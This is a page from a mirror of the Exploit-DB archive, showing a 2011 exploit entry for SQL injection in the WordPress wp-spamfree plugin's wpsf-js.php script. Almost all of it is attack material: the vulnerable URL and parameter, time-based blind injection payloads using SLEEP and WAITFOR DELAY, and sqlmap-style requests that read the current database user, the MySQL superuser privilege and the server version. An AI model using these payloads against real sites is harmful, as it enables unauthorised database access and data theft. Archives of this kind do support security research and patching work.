bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17970.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
707 B
Text
Raw Blame History

#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25
#Author: [cheki]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1
#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)
#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()
#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)
#Home page: http://hacking.ge/
Reference in a new issue View git blame Copy permalink